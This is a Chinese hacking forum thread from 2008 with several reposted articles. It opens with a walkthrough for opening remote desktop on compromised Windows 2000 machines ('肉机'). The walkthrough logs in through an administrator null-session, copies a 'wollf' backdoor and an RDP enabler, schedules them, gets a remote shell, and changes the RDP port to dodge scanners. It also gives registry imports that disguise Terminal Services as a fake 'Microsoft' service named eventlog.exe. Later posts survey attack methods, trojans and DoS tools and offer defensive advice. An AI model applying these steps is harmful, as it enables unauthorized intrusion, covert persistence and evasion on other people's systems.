C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.
 

 

==========================================================================================
第四种方法:
==========================================================================================

C:\documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------连接成功!
命令成功完成。

C:\documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi
n$------------------------------拷贝wollf.exe到目标计算机的admin$目录
已复制 1 个文件。

C:\documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录
已复制 1 个文件。

C:\documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的当前时间是 2002/12/1 上午 06:37
命令成功完成。

C:\documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行
------------------------------------------------------------------------------------------
说明:
wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内

容有关的命令参数,它的高级用法不做补充。
hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。
2分钟后......
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 45 发表于: 2008-06-14 22:46:13
开启3389的5种方法(下)

------------------------------------------------------------------------------------------
C:\documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org/
------------------------------------------------------------------------------------------
说明:
使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -connect IP 7614
7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。

------------------------------------------------------------------------------------------
[server@D:\WINNT\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
© 版权所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
说明:
输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。


------------------------------------------------------------------------------------------
D:\WINNT\system32>cd..
cd..

D:\WINNT>dir h*.*
dir h*.*
驱动器 D 中的卷没有标签。
卷的序列号是 1CE5-2615

D:\WINNT 的目录

2002-11-27 03:07 Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 个文件 35,328 字节
1 个目录 9,049,604,096 可用字节

D:\WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
说明:
因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。


==========================================================================================
D:\WINNT>exit
exit

Command "DOS" succeed.

[server@D:\WINNT\system32]#reboot


Command "REBOOT" succeed.

[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------------------------------------------------
说明:
由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT
命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下

。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装

终端服务。

到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务!

我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对

目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口

来躲过普通扫描器的扫描!修改方法如下:
修改服务器端的端口设置 ,注册表有2个地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如1314
第二个地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] 
PortNumber值,默认是3389,修改成所希望的端口,比如1314
现在这样就可以了。重启系统吧。
注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\
表示具体的某个RDP-TCP连结。
重启过后,看看端口有没有改。
小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。
 

==========================================================================================
第五种方法:
==========================================================================================

 
一.原理性基本安装
1.将如下注册表键值导入 "肉机" 的注册表中:

-------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
etcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

-----------
2.重新起动"肉机"。

3.使用本地的3398客户端,连接 "肉机" .

4.优(缺)点:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".

5.与"sysocmgr /iysoc.inf /u:u.txt /q" 的比较:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 处于已安装状态.
B."肉机"中 "开始-->程序-->管理工具" 增加 "终端服务管理器","终端服务配置" 和 "终端服务客户端生成器".
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 变为 "已起动" 和"自动".
D."肉机"中 "Windows 任务管理器-->进程" 内,增加 "Termsrv.exe".
E.需要拷贝几兆的文件到"肉机"中.

二.抛砖引玉性"隐蔽"安装:

1.将"肉机"中 "c:\winnt\system32\termsrv.exe" 文件作一备份,命名为"eventlog.exe",仍将其放入目录 "c:\winnt\system32\"

2.将如下注册表键值导入 "肉机" 的注册表中:

------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
etcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"

---------------

3.重新起动"肉机"。

4.使用本地的3398客户端,连接“肉机”。

5.优(缺)点:

A."肉机"中 "控制面板-->添加/删除程序-->添加/删除 Windows 组件-->终端服务" 仍然处于未安装状态.
B."肉机"中 "开始-->程序-->管理工具" 没有任何变动.
C."肉机"中 "开始-->程序-->管理工具-->服务-->Terminal Services" 没有变化,保持原始状态.
D."肉机"中 "开始-->程序-->管理工具-->服务" 增加 "Microsoft"
E."肉机"中 "Windows 任务管理器-->进程" 内,增加 "eventlog.exe".

三.理论简介

如此简单? 只修改注册表? 不需要拷贝W2k源文件?

让我们从一条命令行语句说起,这条语句是: "sysocmgr /iysoc.inf /u:u.txt /q" . 其中 u.txt 如下:
-------------
[Components]
TsEnable = on
-------------

首先认识 "sysoc.inf"."sysoc.inf" 是安装信息文件,位于 "c:\winnt\inf". 打开它,在 "[Components]" 节,找到与 "终端服务" 有关的条目:

"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2"

这里引出另外一个安装信息文件: "TsOc.inf". 这个文件同样位于 "c:\winnt\inf".

打开这个文件,你会发现,如同 windows 环境下的软件安装, "终端服务" 的安装, 也主要由三个部分: 拷贝源文件,注册 DLL 以及修改注册表.

在 [TerminalServices.FreshInstall] 节 和 "File Sections" 部分,你会发现 "终端服务" 所需的系统文件,DLL 和驱动, 随同 W2k 的初始安装,都已安然就位.

为什么 "终端服务" 的常规安装和命令行安装都需要拷贝W2k源文件? 事实上,所拷贝的是"终端服务"客户端软件,既 "开始-->程序-->管理工具-->终端服务客户端生成器" 生成客户软盘需要的文件.

各位 "黑友" 提供的包或工具,里面包括的W2k源文件,都是 "tsc32" 打头的. 关连 "TsOc.inf" 的 "File Sections" 部分和另外一个文件 "c:\winnt\inf\layout.inf",你将会得到证实.

"终端服务"的安装,需要注册俩个 "DLL". 这俩个 "DLL" 同样早早就住在系统里,想必它们一定也有了身份证.

"TsOc.inf" 文件一半的内容是关于修改注册表. 但"终端服务" 需要的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系统安装时注册过的.

我们回头看一下那个命令行语句, "/u:" 参数后面的无人职守安装信息文件 "u.txt". "TsEnable = on" ?

"TsOc.inf" 文件 [Optional Components] 节中有三个选项, "TerminalServices", "TSEnable" ,"TSClients".

"TerminalServices" 如上所述,在系统初始安装时,已经就序. "TSClients" 与 "终端服务" 没有直接的关系.

我们在 "TsOc.inf" 找到 "[TsEnable]" 节. 此节中有用的信息只有一条 "ToggleOnSection = TerminalServices.ToggleOn". 再转到 [TerminalServices.ToggleOn] 节.

[TerminalServices.ToggleOn] 节告诉我们,下一站是 "Reg.ToggleOn", 沿着这个线索,我们来到 [Reg.ToggleOn], 你看到什么?
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 46 发表于: 2008-06-14 22:46:31
网络常见攻击及防范手册(上)

一、前言

  在网络这个不断更新换代的世界里,网络中的安全漏洞无处不在。即便旧的安全漏洞补上了,新的安全漏洞又将不断涌现。网络攻击正是利用这些存在的漏 洞和安全缺陷对系统和资源进行攻击。

  也许有人会对网络安全抱着无所谓的态度,认为最多不过是被攻击者盗用账号,造不成多大的危害。他们往往会认为“安全”只是针对那些大中型企事业单位和网站而言。其实,单从技术上说,黑客入侵的动机是成为目标主机的主人。只要他们获得了一台网络主机的超级用户权限后他们就有可能在该主机上修改资源配置、安置“特洛伊”程序、隐藏行踪、执行任意进程等等。我们谁又愿意别人在我们的机器上肆无忌惮地拥有这些特权呢?更何况这些攻击者的动机也不都是那么单纯。因此,我们每一个人都有可能面临着安全威胁,都有必要对网络安全有所了解,并能够处理一些安全方面的问题。

  下面我们就来看一下那些攻击者是如何找到你计算机中的安全漏洞的,并了解一下他们的攻击手法。

  二、网络攻击的步骤

  第一步:隐藏自已的位置

  普通攻击者都会利用别人的电脑隐藏他们真实的IP地址。老练的攻击者还会利用800电话的无人转接服务联接ISP,然后再盗用他人的帐号上网。

  第二步:寻找目标主机并分析目标主机

  攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的想跳楼作系统类型及其所提供服务等资料作个全面的了解。此时,攻击者们会使用一些扫描器工具,轻松获取目标主机运行的是哪种想跳楼作系统的哪个版本,系统有哪些帐户,WWW、FTP、Telnet 、SMTP等服务器程序是何种版本等资料,为入侵作好充分的准备。

  第三步:获取帐号和密码,登录主机

  攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。

  第四步:获得控制权

  攻击者们用FTP、Telnet等工具利用系统漏洞进入进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程想跳楼纵程序,以便日后可以不被觉察地再次进入系统。大多数后门程序是预先编译好的,只需要想办法修改时间和权限就可以使用了,甚至新文件的大小都和原文件一模一样。攻击者一般会使用rep传递这些文件,以便不留下FTB记录。清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。

  第五步:窃取网络资源和特权

  攻击者找到攻击目标后,会继续下一步的攻击。如:下载敏感信息;实施窃取帐号密码、信用卡号等经济偷窃;使网络瘫痪。

三、网络攻击的原理和手法

  1、口令入侵

  所谓口令入侵是指使用某些合法用户的帐号和口令登录到目的主机,然后再实施攻击活动。这种方法的前提是必须先得到该主机上的某个合法用户的帐号,然后再进行合法用户口令的破译。获得普通用户帐号的方法很多,如

  利用目标主机的Finger功能:当用Finger命令查询时,主机系统会将保存的用户资料(如用户名、登录时间等)显示在终端或计算机上;
  利用目标主机的X.500服务:有些主机没有关闭X.500的目录查询服务,也给攻击者提供了获得信息的一条简易途径;
  从电子邮件地址中收集:有些用户电子邮件地址常会透露其在目标主机上的帐号;
  查看主机是否有习惯性的帐号:有经验的用户都知道,很多系统会使用一些习惯性的帐号,造成帐号的泄露。

  这又有三种方法:

  (1)是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大。监听者往往采用中途截击的方法也是获取用户帐户和密码的一条有效途径。当下,很多协议根本就没有采用任何加密或身份认证技术,如在Telnet、FTP、HTTP、SMTP等传输协议中,用户帐户和密码信息都是以明文格式传输的,此时若攻击者利用数据包截取工具便可很容易收集到你的帐户和密码。还有一种中途截击攻击方法更为厉害,它可以在你同服务器端完成“三次握手”建立连接之后,在通信过程中扮演“第三者”的角色,假冒服务器身份欺骗你,再假冒你向服务器发出恶意请求,其造成的后果不堪设想。另外,攻击者有时还会利用软件和硬件工具时刻监视系统主机的工作,等待记录用户登录信息,从而取得用户密码;或者编制有缓冲区溢出错误的SUID程序来获得超级用户权限。

  (2)是在知道用户的账号后(如电子邮件@前面的部分)利用一些专门软件强行破解用户口令,这种方法不受网段限制,但攻击者要有足够的耐心和时间。如:采用字典穷举法(或称暴力法)来破解用户的密码。攻击者可以通过一些工具程序,自动地从电脑字典中取出一个单词,作为用户的口令,再输入给远端的主机,申请进入系统;若口令错误,就按序取出下一个单词,进行下一个尝试,并一直循环下去,直到找到正确的口令或字典的单词试完为止。由于这个破译过程由计算机程序来自动完成,因而几个小时就可以把上十万条记录的字典里所有单词都尝试一遍。

  (3)是利用系统管理员的失误。在现代的Unix想跳楼作系统中,用户的基本信息存放在passwd文件中,而所有的口令则经过DES加密方法加密后专门存放在一个叫shadow的文件中。黑客们获取口令文件后,就会使用专门的破解DES加密法的程序来解口令。同时,由于为数不少的想跳楼作系统都存在许多安全漏洞、Bug或一些其他设计缺陷,这些缺陷一旦被找出,黑客就可以长驱直入。例如,让Windows95/98系统后门洞开的BO就是利用了 Windows的基本设计缺陷。
2、放置特洛伊木马程序

  特洛伊木马程序可以直接侵入用户的电脑并进行破坏,它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载,一旦用户打开了这些邮件的附件或者执行了这些程序之后,它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中,并在自己的计算机系统中隐藏一个可以在windows启动时悄悄执行的程序。当您连接到因特网上时,这个程序就会通知攻击者,来报告您的IP地址以及预先设定的端口。攻击者在收到这些信息后,再利用这个潜伏在其中的程序,就可以任意地修改你的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等,从而达到控制你的计算机的目的。

  3、WWW的欺骗技术

在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问,如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在:正在访问的网页已经被黑客篡改过,网页上的信息是虚假的!例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器,当用户浏览目标网页的时候,实际上是向黑客服务器发出请求,那么黑客就可以达到欺骗的目的了。

  一般Web欺骗使用两种技术手段,即URL地址重写技术和相关信关信息掩盖技术。利用URL地址,使这些地址都向攻击者的Web服务器,即攻击者可以将自已的Web地址加在所有URL地址的前面。这样,当用户与站点进行安全链接时,就会毫不防备地进入攻击者的服器,于是用记的所有信息便处于攻击者的监视之中。但由于浏览器材一般均设有地址栏和状态栏,当浏览器与某个站点边接时,可以在地址栏和状态样中获得连接中的Web站点地址及其相关的传输信息,用户由此可以发现问题,所以攻击者往往在URLf址重写的同时,利用相关信息排盖技术,即一般用javascript程序来重写地址样和状枋样,以达到其排盖欺骗的目的。

  4、电子邮件攻击

  电子邮件是互联网上运用得十分广泛的一种通讯方式。攻击者可以使用一些邮件炸弹软件或CGI程序向目的邮箱发送大量内容重复、无用的垃圾邮件,从而使目的邮箱被撑爆而无法使用。当垃圾邮件的发送流量特别大时,还有可能造成邮件系统对于正常的工作反映缓慢,甚至瘫痪。相对于其它的攻击手段来说,这种攻击方法具有简单、见效快等优点。

  电子邮件攻击主要表现为两种方式:

  (1)是电子邮件轰炸和电子邮件“*雪球”,也就是通常所说的邮件炸弹,指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件,致使受害人邮箱被“炸”,严重者可能会给电子邮件服务器想跳楼作系统带来危险,甚至瘫痪;

  (2)是电子邮件欺骗,攻击者佯称自己为系统管理员(邮件地址和系统管理员完全相同),给用户发送邮件要求用户修改口令(口令可能为指定字符串)或在貌似正常的附件中加载病毒或其他木马程序。
5、通过一个节点来攻击其他节点

  攻击者在突破一台主机后,往往以此主机作为根据地,攻击其他主机(以隐蔽其入侵路径,避免留下蛛丝马迹)。他们可以使用网络监听方法,尝试攻破同一网络内的其他主机;也可以通过IP欺骗和主机信任关系,攻击其他主机。

  这类攻击很狡猾,但由于某些技术很难掌握,如TCP/IP欺骗攻击。攻击者通过外部计算机伪装成另一台合法机器来实现。它能磙坏两台机器间通信链路上的数据,其伪装的目的在于哄骗网络中的其它机器误将其攻击者作为合法机器加以接受,诱使其它机器向他发送据或允许它修改数据。TCP/IP欺骗可以发生 TCP/IP系统的所有层次上,包括数据链路层、网络层、运输层及应用层均容易受到影响。如果底层受到损害,则应用层的所有协议都将处于危险之中。另外由于用户本身不直接与底层相互相交流,因而对底层的攻击更具有欺骗性。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 47 发表于: 2008-06-14 22:46:51
网络常见攻击及防范手册(下)

6、网络监听

  网络监听是主机的一种工作模式,在这种模式下,主机可以接收到本网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接收方是谁。因为系统在进行密码校验时,用户输入的密码需要从用户端传送到服务器端,而攻击者就能在两端之间进行数据监听。此时若两台主机进行通信的信息没有加密,只要使用某些网络监听工具(如NetXRay for Windows95/98/NT、Sniffit for Linux、Solaries等)就可轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性,但监听者往往能够获得其所在网段的所有用户帐号及口令。

  7、利用黑客软件攻击

  利用黑客软件攻击是互联网上比较多的一种攻击手法。Back Orifice2000、冰河等都是比较著名的特洛伊木马,它们可以非法地取得用户电脑的超级用户级权利,可以对其进行完全的控制,除了可以进行文件想跳楼作外,同时也可以进行对方桌面抓图、取得密码等想跳楼作。这些黑客软件分为服务器端和用户端,当黑客进行攻击时,会使用用户端程序登陆上已安装好服务器端程序的电脑,这些服务器端程序都比较小,一般会随附带于某些软件上。有可能当用户下载了一个小游戏并运行时,黑客软件的服务器端就安装完成了,而且大部分黑客软件的重生能力比较强,给用户进行清除造成一定的麻烦。特别是最近出现了一种TXT文件欺骗手法,表面看上去是一个TXT文本文件,但实际上却是一个附带黑客程序的可执行程序,另外有些程序也会伪装成图片和其他格式的文件。

  8、安全漏洞攻击

  许多系统都有这样那样的安全漏洞(Bugs)。其中一些是想跳楼作系统或应用软件本身具有的。如缓冲区溢出攻击。由于很多系统在不检查程序与缓冲之间变化的情况,就任意接受任意长度的数据输入,把溢出的数据放在堆栈里,系统还照常执行命令。这样攻击者只要发送超出缓冲区所能处理的长度的指令,系统便进入不稳定状态。若攻击者特别配置一串准备用作攻击的字符,他甚至可以访问根目录,从而拥有对整个网络的绝对控制权。另一些是利用协议漏洞进行攻击。如攻击者利用POP3一定要在根目录下运行的这一漏洞发动攻击,破坏的根目录,从而获得超级用户的权限。又如,ICMP协议也经常被用于发动拒绝服务攻击。它的具体手法就是向目的服务器发送大量的数据包,几乎占取该服务器所有的网络宽带,从而使其无法对正常的服务请求进行处理,而导致网站无法进入、网站响应速度大大降低或服务器瘫痪。现在常见的蠕虫病毒或与其同类的病毒都可以对服务器进行拒绝服务攻击的进攻。它们的繁殖能力极强,一般通过Microsoft的 Outlook软件向众多邮箱发出带有病毒的邮件,而使邮件服务器无法承担如此庞大的数据处理量而瘫痪。对于个人上网用户而言,也有可能遭到大量数据包的攻击使其无法进行正常的网络想跳楼作。

  9、端口扫描攻击

  所谓端口扫描,就是利用Socket编程与目标主机的某些端口建立TCP连接、进行传输协议的验证等,从而侦知目标主机的扫描端口是否是处于激活状态、主机提供了哪些服务、提供的服务中是否含有某些缺陷等等。常用的扫描方式有:Connect()扫描。Fragmentation扫描
四、攻击者常用的攻击工具

  1、DOS攻击工具:

  如WinNuke通过发送OOB漏洞导致系统蓝屏;Bonk通过发送大量伪造的UDP数据包导致系统重启;TearDrop通过发送重叠的IP碎片导致系统的TCP/IP栈崩溃;WinArp通过发特殊数据包在对方机器上产生大量的窗口;Land通过发送大量伪造源IP的基于SYN的TCP请求导致系统重启动;FluShot通过发送特定IP包导致系统凝固;Bloo通过发送大量的ICMP数据包导致系统变慢甚至凝固;PIMP通过IGMP漏洞导致系统蓝屏甚至重新启动;Jolt通过大量伪造的ICMP和UDP导致系统变的非常慢甚至重新启动。

  2、木马程序

  (1)、BO2000(BackOrifice):它是功能最全的TCP/IP构架的攻击工具,可以搜集信息,执行系统命令,重新设置机器,重新定向网络的客户端/服务器应用程序。BO2000支持多个网络协议,它可以利用TCP或UDP来传送,还可以用XOR加密算法或更高级的3DES加密算法加密。感染BO2000后机器就完全在别人的控制之下,黑客成了超级用户,你的所有想跳楼作都可由BO2000自带的“秘密摄像机”录制成“录像带”。

  (2)、“冰河”:冰河是一个国产木马程序,具有简单的中文使用界面,且只有少数流行的反病毒、防火墙才能查出冰河的存在。冰河的功能比起国外的木马程序来一点也不逊色。它可以自动跟踪目标机器的屏幕变化,可以完全模拟键盘及鼠标输入,即在使被控端屏幕变化和监控端产生同步的同时,被监控端的一切键盘及鼠标想跳楼作将反映在控端的屏幕。它可以记录各种口令信息,包括开机口令、屏保口令、各种共享资源口令以及绝大多数在对话框中出现过的口令信息;它可以获取系统信息;它还可以进行注册表想跳楼作,包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表想跳楼作。

  (3)、NetSpy:可以运行于Windows95/98/NT/2000等多种平台上,它是一个基于TCP/IP的简单的文件传送软件,但实际上你可以将它看作一个没有权限控制的增强型FTP服务器。通过它,攻击者可以神不知鬼不觉地下载和上传目标机器上的任意文件,并可以执行一些特殊的想跳楼作。

  (4)、Glacier:该程序可以自动跟踪目标计算机的屏幕变化、获取目标计算机登录口令及各种密码类信息、获取目标计算机系统信息、限制目标计算机系统功能、任意想跳楼作目标计算机文件及目录、远程关机、发送信息等多种监控功能。类似于BO2000。

  (5)、KeyboardGhost:Windows系统是一个以消息循环(MessageLoop)为基础的想跳楼作系统。系统的核心区保留了一定的字节作为键盘输入的缓冲区,其数据结构形式是队列。键盘幽灵正是通过直接访问这一队列,使键盘上输入你的电子邮箱、代理的账号、密码Password (显示在屏幕上的是星号)得以记录,一切涉及以星号形式显示出来的密码窗口的所有符号都会被记录下来,并在系统根目录下生成一文件名为KG.DAT的隐含文件。

  (6)、ExeBind:这个程序可以将指定的攻击程序捆绑到任何一个广为传播的热门软件上,使宿主程序执行时,寄生程序也在后台被执行,且支持多重捆绑。实际上是通过多次分割文件,多次从父进程中调用子进程来实现的。
五、网络攻击应对策略

  在对网络攻击进行上述分析与识别的基础上,我们应当认真制定有针对性的策略。明确安全对象,设置强有力的安全保障体系。有的放矢,在网络中层层设防,发挥网络的每层作用,使每一层都成为一道关卡,从而让攻击者无隙可钻、无计可使。还必须做到未雨稠缪,预防为主,将重要的数据备份并时刻注意系统运行状况。以下是针对众多令人担心的网络安全问题,提出的几点建议

  1、提高安全意识

  (1)不要随意打开来历不明的电子邮件及文件,不要随便运行不太了解的人给你的程序,比如“特洛伊”类黑客程序就需要骗你运行。
  (2)尽量避免从Internet下载不知名的软件、游戏程序。即使从知名的网站下载的软件也要及时用最新的病毒和木马查杀软件对软件和系统进行扫描。
  (3)密码设置尽可能使用字母数字混排,单纯的英文或者数字很容易穷举。将常用的密码设置不同,防止被人查出一个,连带到重要密码。重要密码最好经常更换。
  (4)及时下载安装系统补丁程序。
  (5)不随便运行黑客程序,不少这类程序运行时会发出你的个人信息。
  (6)在支持HTML的BBS上,如发现提交警告,先看源代码,很可能是骗取密码的陷阱。

  2、使用防毒、防黑等防火墙软件。

  防火墙是一个用以阻止网络中的黑客访问某个机构网络的屏障,也可称之为控制进/出两个方向通信的门槛。在网络边界上通过建立起来的相应网络通信监控系统来隔离内部和外部网络,以阻档外部网络的侵入。

  3、设置代理服务器,隐藏自已的IP地址。

  保护自己的IP地址是很重要的。事实上,即便你的机器上被安装了木马程序,若没有你的IP地址,攻击者也是没有办法的,而保护IP地址的最好方法就是设置代理服务器。代理服务器能起到外部网络申请访问内部网络的中间转接作用,其功能类似于一个数据转发器,它主要控制哪些用户能访问哪些服务类型。当外部网络向内部网络申请某种网络服务时,代理服务器接受申请,然后它根据其服务类型、服务内容、被服务的对象、服务者申请的时间、申请者的域名范围等来决定是否接受此项服务,如果接受,它就向内部网络转发这项请求。

  4、将防毒、防黑当成日常例性工作,定时更新防毒组件,将防毒软件保持在常驻状态,以彻底防毒。

  5、由于黑客经常会针对特定的日期发动攻击,计算机用户在此期间应特别提高警戒。

  6、对于重要的个人资料做好严密的保护,并养成资料备份的习惯。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 48 发表于: 2008-06-14 22:47:11
DOS攻击原理及方法介绍

已经有很多介绍DOS(Denial of Service,即拒绝服务)攻击的文章,但是,多数人还是不知道DOS到底是什么,它到底是怎么实现的。本文主要介绍DOS的机理和常见的实施方法。因前段时间仔细了解了TCP/IP协议以及RFC文档,有点心得。同时,文中有部分内容参考了Shaft的文章翻译而得
。要想了解DOS攻击得实现机理,必须对TCP有一定的了解。所以,本文分为两部分,第一部分介绍一
些实现DOS攻击相关的协议,第二部分则介绍DOS的常见方式。

1、 什么是DOS攻击
DOS:即Denial Of Service,拒绝服务的缩写,可不能认为是微软的dos想跳楼作系统了。好象在5·1的时候闹过这样的笑话。拒绝服务,就相当于必胜客在客满的时候不再让人进去一样,呵呵,你想吃馅饼,就必须在门口等吧。DOS攻击即攻击者想办法让目标机器停止提供服务或资源访问,这些资源包括磁盘空间、内存、进程甚至网络带宽,从而阻止正常用户的访问。比如:
* 试图FLOOD服务器,阻止合法的网络通?br>* 破坏两个机器间的连接,阻止访问服务
* 阻止特殊用户访问服务
* 破坏服务器的服务或者导致服务器死机
不过,只有那些比较阴险的攻击者才单独使用DOS攻击,破坏服务器。通常,DOS攻击会被作为一次入侵的一部分,比如,绕过入侵检测系统的时候,通常从用大量的攻击出发,导致入侵检测系统日志过多或者反应迟钝,这样,入侵者就可以在潮水般的攻击中混骗过入侵检测系统。

2、有关TCP协议的东西
TCP(transmission control protocol,传输控制协议),是用来在不可靠的因特网上提供可靠的、端到端的字节流通讯协议,在RFC793中有正式定义,还有一些解决错误的东西在RFC 1122中有记录,RFC 1323则有TCP的功能扩展。

我们常见到的TCP/IP协议中,IP层不保证将数据报正确传送到目的地,TCP则从本地机器接受用户的数据流,将其分成不超过64K字节的数据片段,将每个数据片段作为单独的IP数据包发送出去,最后在目的地机器中再组合成完整的字节流,TCP协议必须保证可靠性。

发送和接收方的TCP传输以数据段的形式交换数据,一个数据段包括一个固定的20字节头,加上可选部分,后面再跟上数据,TCP协议从发送方传送一个数据段的时候,还要启动计时器,当数据段到达目的地后,接收方还要发送回一个数据段,其中有一个确认序号,它等于希望收到的下一个数据段的顺序号,如果计时器在确认信息到达前超时了,发送方会重新发送这个数据段。

上面,我们总体上了解一点TCP协议,重要的是要熟悉TCP的数据头(header)。因为数据流的传输最重要的就是header里面的东西,至于发送的数据,只是header附带上的。客户端和服务端的服务响应就是同header里面的数据相关,两端的信息交流和交换是根据header中的内容实施的,因此,要实现DOS,就必须对header中的内容非常熟悉。

下面是TCP数据段头格式。
Source Port和 Destination Port :是本地端口和目标端口
